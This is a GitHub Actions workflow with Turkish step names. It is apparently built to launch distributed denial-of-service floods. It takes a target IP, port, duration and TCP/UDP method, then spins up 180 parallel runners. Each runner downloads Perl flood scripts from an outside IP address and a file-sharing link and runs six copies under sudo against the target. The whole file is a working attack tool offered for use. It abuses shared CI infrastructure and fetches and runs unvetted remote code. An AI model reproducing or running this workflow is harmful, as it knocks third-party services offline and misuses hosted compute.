name: Run Script

on:
  workflow_dispatch:
    inputs:
      ip:
        description: "Target IP"
        required: true
      port:
        description: "Target Port"
        required: true
      time:
        description: "Duration"
        required: true
      method:
        description: "Method"
        required: true

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 180
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180]

    steps:
      - name: İndir ve Hazırla
        run: |
          METHOD="${{ inputs.method }}"

          if [ "$METHOD" = "tcp" ]; then
            echo "TCP methodu indiriliyor..."
            wget http://91.232.103.84/deneme.perl -O a

          elif [ "$METHOD" = "udp" ]; then
            echo "UDP methodu indiriliyor..."
            wget https://wgetz.com/2wtROgDTtf/hoplatici.pl -O hoplatici.pl
            chmod +x hoplatici.pl

          else
            echo "Geçersiz method: $METHOD"
            exit 1
          fi
          
      - name: SÖMÜRÜ İŞLEMLERİNİ BAŞLAT (4x Tekrar)
        run: |
          METHOD="${{ inputs.method }}"
          PIDS=()

          if [ "$METHOD" = "tcp" ]; then
            echo "TCP method seçildi"

            for i in {1..6}; do
              sudo perl a ${{ inputs.ip }} ${{ inputs.port }} ${{ inputs.time }} 200 &
              PIDS+=($!)
            done

          elif [ "$METHOD" = "udp" ]; then
            echo "UDP method seçildi"

             for i in {1..6}; do
               sudo perl hoplatici.pl ${{ inputs.ip }} ${{ inputs.port }} 1024 ${{ inputs.time }} &
               PIDS+=($!)
             done

          else
            echo "Geçersiz method: $METHOD"
            exit 1
          fi

          for pid in "${PIDS[@]}"; do
             wait "$pid"
          done


      - name: Bitti
        run: |
          # Son bir uyku çek ve kapan
          sleep 60
          exit 0
